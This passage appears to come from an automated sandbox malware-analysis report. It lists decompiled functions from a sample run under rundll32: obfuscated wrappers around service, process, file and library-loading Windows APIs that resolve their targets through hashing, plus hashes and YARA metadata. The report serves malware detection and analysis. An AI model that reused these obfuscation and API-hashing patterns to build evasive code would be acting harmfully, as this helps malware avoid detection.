RtlAllocateHeap.NTDLL(?,026DAAD3,B4ED5042,?,?,?,?,?,?,?,?,?,?), ref: 001D807E

Strings

Ia, xrefs: 001D8018
K=, xrefs: 001D7FE4

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: Ia$K=
API String ID: 1279760036-1694132640
Opcode ID: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction ID: f780d85f295fd0aa3aad21468766ecfc0e265b5accef9e4503af8e688740e7ed
Opcode Fuzzy Hash: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction Fuzzy Hash: FE115971E00218EBEF04DFE5C90A8DEBFB2EB41310F108189FA1466250C3B69A218B91

Uniqueness

Uniqueness Score: -1.00%

Function 001D29A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 001D2A76

Strings

-:, xrefs: 001D29C4

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: -:
API String ID: 1514166925-3625610842
Opcode ID: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction ID: 3d91dc7d8e8f70b51de454d7596b622e0cd896f7984e1d23ef5fec51c4d61123
Opcode Fuzzy Hash: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction Fuzzy Hash: 362153B2D01219BBDF15DFD5C84A8DEBBB5FF14758F108088E92862210D3B98B64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 001C30A4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E001C30A4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t51;
				signed int _t53;
				signed int _t54;
				void* _t61;

				_push(_a12);
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001CE171(_t40);
				_v20 = 0x20f1;
				_v20 = _v20 | 0xe56d7bd2;
				_v20 = _v20 ^ 0xe56d3b5f;
				_v16 = 0x60a3;
				_v16 = _v16 | 0xd94b0631;
				_v16 = _v16 ^ 0xd94b4fc4;
				_v8 = 0x959e;
				_t53 = 0x46;
				_v8 = _v8 / _t53;
				_v8 = _v8 + 0xffff8b5f;
				_t54 = 0x4f;
				_v8 = _v8 / _t54;
				_v8 = _v8 ^ 0x033dd111;
				_v12 = 0xe903;
				_v12 = _v12 + 0xffff1267;
				_v12 = _v12 ^ 0xffffff7c;
				E001C606F(0x14b, 0xbee648b, _t54, _t54, 0x43269794);
				_t51 = CloseServiceHandle(_t61); // executed
				return _t51;
			}

APIs

CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 001C3154

Strings

_;m, xrefs: 001C313C

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: _;m
API String ID: 1725840886-664033043
Opcode ID: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction ID: 6bb8085b0547b0102b1ffaf7b26fe8547b22063a2f78327ab1852417bd83d23d
Opcode Fuzzy Hash: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction Fuzzy Hash: 19113D76E00218FFEB04DFE8CC468DEBBB1EB54310F108599E924AB292D7B55B119B91

Uniqueness

Uniqueness Score: -1.00%

Function 001CF3A1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E001CF3A1(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t47;
				int _t56;
				signed int _t58;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001CE171(_t47);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x698c42;
				_v32 = 0x65248e;
				_v20 = 0xa27a;
				_v20 = _v20 + 0xffff8606;
				_v20 = _v20 ^ 0x0000421b;
				_v12 = 0x888c;
				_v12 = _v12 | 0xe1cd902e;
				_v12 = _v12 + 0xffffedb1;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x3619039d;
				_v8 = 0xd309;
				_v8 = _v8 + 0xffffb24a;
				_t58 = 0x7c;
				_v8 = _v8 / _t58;
				_v8 = _v8 + 0xffff0c2b;
				_v8 = _v8 ^ 0xffff0ba7;
				_v16 = 0xb808;
				_v16 = _v16 ^ 0x5e52e920;
				_v16 = _v16 ^ 0x5e521231;
				E001C606F(0x24a, 0xbee648b, _t58, _t58, 0x8c7a977b);
				_t56 = DeleteService(_a8); // executed
				return _t56;
			}

0x001cf3a7
0x001cf3aa
0x001cf3ad
0x001cf3b2
0x001cf3b7
0x001cf3bd
0x001cf3c1
0x001cf3c8
0x001cf3cf
0x001cf3d6
0x001cf3dd
0x001cf3e4
0x001cf3eb
0x001cf3f2
0x001cf3f9
0x001cf3fd
0x001cf404
0x001cf40b
0x001cf417
0x001cf422
0x001cf425
0x001cf42c
0x001cf433
0x001cf43a
0x001cf441
0x001cf460
0x001cf46b
0x001cf470

APIs

DeleteService.ADVAPI32(5E521231,?,?,?,?,?,?,?,?,001D5AB9), ref: 001CF46B

Strings

R^, xrefs: 001CF43A

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteService
String ID: R^
API String ID: 700001626-2418246705
Opcode ID: c572dde824089236a44e0ab9bbda36ed179f0479f126dd6d3edbdeaa6739ec59
Instruction ID: 4bc45be62fe60962586a47d77d9b6e60f4c6ea7ecef764879e63fe35e05ecaa5
Opcode Fuzzy Hash: c572dde824089236a44e0ab9bbda36ed179f0479f126dd6d3edbdeaa6739ec59
Instruction Fuzzy Hash: 78214771D00309EFDF44DFE4C84AAAEBBB1FB54314F108188E511662A0D7B85B518F91

Uniqueness

Uniqueness Score: -1.00%

Function 001CE172, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E001CE172(void* __ecx, void* __edx, void* _a4, int _a8, short* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t41;
				void* _t48;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001CE171(_t41);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2ee32c;
				_v20 = 0x466;
				_v20 = _v20 + 0xbcb9;
				_v20 = _v20 ^ 0x000097c2;
				_v8 = 0x1d17;
				_v8 = _v8 + 0xe3a6;
				_v8 = _v8 | 0x1371b482;
				_v8 = _v8 + 0xcae3;
				_v8 = _v8 ^ 0x13721426;
				_v16 = 0xc1c8;
				_v16 = _v16 + 0xffff2ba9;
				_v16 = _v16 ^ 0xffffbe8b;
				_v12 = 0x3352;
				_v12 = _v12 << 9;
				_v12 = _v12 | 0x4940d942;
				_v12 = _v12 ^ 0x4966c2a7;
				E001C606F(0x24f, 0xbee648b, __ecx, __ecx, 0x334b429d);
				_t48 = OpenServiceW(_a4, _a12, _a8); // executed
				return _t48;
			}

APIs

OpenServiceW.ADVAPI32(4966C2A7,000097C2,FFFFBE8B,?,?,?,?,?,?,?,?,?,?), ref: 001CE22D

Strings

,., xrefs: 001CE192

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: ,.
API String ID: 3098006287-263192673
Opcode ID: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction ID: 24f4034e0d3e734f49e84866a7de8bf36ab233f79eff65a759f8221ec28445b2
Opcode Fuzzy Hash: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction Fuzzy Hash: 861107B6D0020DFFEF01DFD4C94A8AEBB70FB24304F108188E91566261D3B58B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 001D7998, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E001D7998(void* __ecx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __edx;
				void* _t42;
				struct HINSTANCE__* _t49;
				void* _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001CE171(_t42);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x25d38;
				_v20 = 0x510f;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x00005672;
				_v16 = 0xf8b1;
				_v16 = _v16 + 0xffff15e9;
				_v16 = _v16 + 0xffffcd36;
				_v16 = _v16 ^ 0xffff83d2;
				_v12 = 0x4d1a;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000018af;
				_v8 = 0x7f5d;
				_v8 = _v8 ^ 0x2c3d59fe;
				_v8 = _v8 + 0x58d2;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0x5fdd21ae;
				_push(0x811bfff3);
				_push(0xb6b01ae5);
				_t52 = 0x55;
				E001C606F(_t52);
				_t49 = LoadLibraryW(_a12); // executed
				return _t49;
			}

APIs

LoadLibraryW.KERNEL32(00005672,?,?,?,?,?,?,?,?,38246A1A), ref: 001D7A4A

Strings

rV, xrefs: 001D79C7

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: rV
API String ID: 1029625771-3738762570
Opcode ID: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction ID: a4ca2e479288db054cd5dc328b5d00bd5b35a6bea1ad8120a2f563e062e48cdb
Opcode Fuzzy Hash: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction Fuzzy Hash: 6711F6B6D1160DBBDB14DFA4C84A59EBBB4BB10319F208588E92566250D3B48B149F50

Uniqueness

Uniqueness Score: -1.00%

Function 001DC7C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E001DC7C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t44;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x43a94f;
				_v32 = 0x1049b9;
				_v28 = 0x3eaad4;
				_v20 = 0xf167;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x00002afd;
				_v12 = 0xf1a2;
				_v12 = _v12 + 0xb8a5;
				_v12 = _v12 | 0x0ef61b66;
				_v12 = _v12 ^ 0xe07f37e9;
				_v12 = _v12 ^ 0xee88d275;
				_v8 = 0xe943;
				_v8 = _v8 + 0xe3dd;
				_v8 = _v8 | 0x8abcb7de;
				_v8 = _v8 + 0xffff75bb;
				_v8 = _v8 ^ 0x8abd009e;
				_v16 = 0x92be;
				_v16 = _v16 + 0xa80e;
				_v16 = _v16 ^ 0x00014c59;
				_push(0xec5aa560);
				_push(_t43);
				_push(0xb6b01ae5);
				_t44 = 0x2d;
				E001C606F(_t44);
				ExitProcess(0);
			}

APIs

ExitProcess.KERNELBASE(00000000), ref: 001DC875

Strings

C, xrefs: 001DC817

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: C
API String ID: 621844428-3705061908
Opcode ID: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction ID: 14e5e5e89ebe872798823941106e9f62d50939f587b152c2ac3c85f5d9e2e0d6
Opcode Fuzzy Hash: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction Fuzzy Hash: E2111CB5D0130DEBEB44CFE5D94AAEEBBB0FB14318F208189D51176291D3B85B489F81

Uniqueness

Uniqueness Score: -1.00%

Function 001D0DE5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E001D0DE5(void* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t41;
				int _t53;
				signed int _t55;
				void* _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001CE171(_t41);
				_v8 = 0x13b8;
				_v8 = _v8 + 0x3dca;
				_v8 = _v8 | 0xf08d47e2;
				_t55 = 0x6c;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 ^ 0x7968eec6;
				_v20 = 0x39de;
				_push(0x457707f1);
				_v20 = _v20 / _t55;
				_v20 = _v20 ^ 0x00003bca;
				_v16 = 0x3217;
				_push(_t55);
				_push(_t55);
				_push(0xb6b01ae5);
				_v16 = _v16 * 0x55;
				_v16 = _v16 | 0x68e2e048;
				_v16 = _v16 ^ 0x68f2fb55;
				_v12 = 0x5ca5;
				_v12 = _v12 | 0x2e6919c4;
				_t59 = 0x3f;
				_v12 = _v12 * 0x2e;
				_v12 = _v12 ^ 0x56eeeba3;
				E001C606F(_t59);
				_t53 = CloseHandle(_a8); // executed
				return _t53;
			}

APIs

CloseHandle.KERNELBASE(68F2FB55,?,?,?,?,?,?,?,?,00000000), ref: 001D0E9A

Strings

Hh, xrefs: 001D0E58

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: Hh
API String ID: 2962429428-996502550
Opcode ID: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction ID: b1a1a2dc3468baee27e2ac0f81c817a390eacbe0c00c999d13fea3eb64b2d40a
Opcode Fuzzy Hash: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction Fuzzy Hash: 19110375D0020DEBEF05DFA8C9469AEBFB5EB40304F60C599E924AB261D3B99B118F40

Uniqueness

Uniqueness Score: -1.00%

Function 001D8409, Relevance: 1.6, APIs: 1, Instructions: 80
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E001D8409(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a40, long _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t57;
				void* _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				long _t86;

				_push(_a48);
				_t86 = __edx;
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001CE171(_t57);
				_v28 = 0x3438bc;
				_v24 = 0;
				_v12 = 0xcb52;
				_t74 = 0xd;
				_v12 = _v12 * 0x44;
				_v12 = _v12 * 0x51;
				_v12 = _v12 ^ 0x1116e99e;
				_v20 = 0x8d1c;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x00234fd5;
				_v8 = 0x5991;
				_t75 = 0x12;
				_v8 = _v8 / _t74;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x00000693;
				_v16 = 0xdaea;
				_t76 = 0x6e;
				_v16 = _v16 / _t76;
				_v16 = _v16 ^ 0x00006144;
				E001C606F(0x128, 0xb6b01ae5, _t76, _t76, 0xd3c406ee);
				_t72 = CreateFileW(_a40, _a44, _a32, 0, _a8, _t86, 0); // executed
				return _t72;
			}

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00006144,?,00000000), ref: 001D84EE

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction ID: 1e90740a973d47d08fb50011e67502f147803d5b038ad12153b94ac5ab43a993
Opcode Fuzzy Hash: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction Fuzzy Hash: EB31F472901208BBDF05DF95CD05CDEBFB6EF88314F108199F914A6250D7B69A20DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D8165, Relevance: 1.6, APIs: 1, Instructions: 78
processCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E001D8165(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a4, struct _STARTUPINFOW* _a8, int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t47;
				int _t58;
				signed int _t61;
				void* _t65;
				WCHAR* _t66;
				WCHAR* _t67;

				_push(_a56);
				_t67 = __edx;
				_push(0);
				_push(_a48);
				_t66 = __ecx;
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001CE171(_t47);
				_v16 = 0xa2fc;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0xffff1f57;
				_v16 = _v16 ^ 0xffff035a;
				_v12 = 0x8842;
				_t61 = 0xc;
				_v12 = _v12 * 0xd;
				_push(0xd8c5ba15);
				_v12 = _v12 / _t61;
				_v12 = _v12 ^ 0x0000f812;
				_v20 = 0x5415;
				_push(_t61);
				_push(_t61);
				_push(0xb6b01ae5);
				_v20 = _v20 * 0x5b;
				_v20 = _v20 ^ 0x001da8a2;
				_v8 = 0xf8b5;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x80bbebc5;
				_v8 = _v8 ^ 0x80bbcffb;
				_t65 = 0x47;
				E001C606F(_t65);
				_t58 = CreateProcessW(_t66, _t67, 0, 0, _a20, 0, 0, 0, _a8, _a44); // executed
				return _t58;
			}

APIs

CreateProcessW.KERNEL32(0BF52F2F,00000000,00000000,00000000,00000044,00000000,00000000,00000000,FFFF035A,?), ref: 001D823A

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction ID: 388be4686743caaa7191f1b8de729827da16c6a1fbdd26fc82aac3bc7facd50e
Opcode Fuzzy Hash: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction Fuzzy Hash: F221E3B290020DBFEB058E94CC86CEEBFB9FB44358F108198F91466260D3759A519B50

Uniqueness

Uniqueness Score: -1.00%

Function 001C94A3, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001C94A3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t58;
				void* _t59;

				_t59 = __edx;
				_t58 = __ecx;
				E001CE171(_t40);
				_v20 = 0xa96c;
				_v20 = _v20 ^ 0xdb4b0424;
				_v20 = _v20 ^ 0xdb4b8f37;
				_v8 = 0xec5f;
				_t53 = 0x33;
				_v8 = _v8 * 0x67;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 | 0x13f5ff17;
				_v8 = _v8 ^ 0x13f5eace;
				_v16 = 0x37e2;
				_v16 = _v16 * 0x6f;
				_v16 = _v16 ^ 0x001836ab;
				_v12 = 0x82bd;
				_v12 = _v12 >> 4;
				_t32 = _t53 + 0x5f; // 0x92
				_v12 = _v12 / _t53;
				_v12 = _v12 ^ 0x00002d3b;
				_t50 = E001C606F(_t32, 0xb6b01ae5, _t53, _t53, 0x2e5d2a1c);
				_t51 =  *_t50(_t58, 0, _t59, 0x28, __ecx, __edx, _a4, 0, 0x28, _a16, _a20, _a24); // executed
				return _t51;
			}

APIs

SetFileInformationByHandle.KERNELBASE(6EE5A95E,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001C955B

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction ID: 1ea032ae8c345a7e8b00b8ffd14956a7110f3542543a8bdb5ca2e39a6153cfee
Opcode Fuzzy Hash: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction Fuzzy Hash: CE215875E01208FBEB18DFA5C946ADEBFB5EB40304F108099F814BB291D3B45B15DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001C8289, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E001C8289(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t39;
				int _t49;
				signed int _t51;

				_push(_a4);
				E001CE171(_t39);
				_v36 = 0x41b5b5;
				asm("stosd");
				_t51 = 0x3d;
				asm("stosd");
				asm("stosd");
				_v12 = 0x9aa2;
				_v12 = _v12 + 0x23f6;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00001b6c;
				_v20 = 0x293c;
				_v20 = _v20 + 0xffff17af;
				_v20 = _v20 ^ 0xffff269b;
				_v16 = 0x3622;
				_v16 = _v16 | 0x78a52f71;
				_v16 = _v16 ^ 0x78a543e8;
				_v8 = 0x2f22;
				_v8 = _v8 + 0x35c7;
				_v8 = _v8 >> 2;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0000117e;
				E001C606F(0x314, 0xb6b01ae5, _t51, _t51, 0x1b106d81);
				_t49 = DeleteFileW(_a4); // executed
				return _t49;
			}

APIs

DeleteFileW.KERNELBASE(00001B6C,?,?,?,?,?,?,00000000), ref: 001C833D

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction ID: 9890a837b8bfe72b49af3072c9b04bb4e998f156bce9cf42e85f7265b3fa9db1
Opcode Fuzzy Hash: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction Fuzzy Hash: C4115B75E0120CFBEB08DFE9C84A9DEBBB5FB54304F108188E410A6264D3B84B198F50

Uniqueness

Uniqueness Score: -1.00%

Function 001C3296, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E001C3296(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t40;
				int _t49;
				signed int _t51;
				struct _SHFILEOPSTRUCTW* _t56;

				_push(_a4);
				_t56 = __ecx;
				_push(__ecx);
				E001CE171(_t40);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x1409b1;
				_v32 = 0x71de97;
				_v20 = 0x10af;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x000096e0;
				_v12 = 0xfce5;
				_v12 = _v12 ^ 0x58bbe0cf;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x02c5a2c7;
				_v16 = 0xf79b;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00000fb9;
				_v8 = 0xa9b8;
				_v8 = _v8 ^ 0x8b980f22;
				_t51 = 0xc;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0ba20c7c;
				E001C606F(0x21a, 0xf44a99f2, _t51, _t51, 0x438313f0);
				_t49 = SHFileOperationW(_t56); // executed
				return _t49;
			}

APIs

SHFileOperationW.SHELL32 ref: 001C3347

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
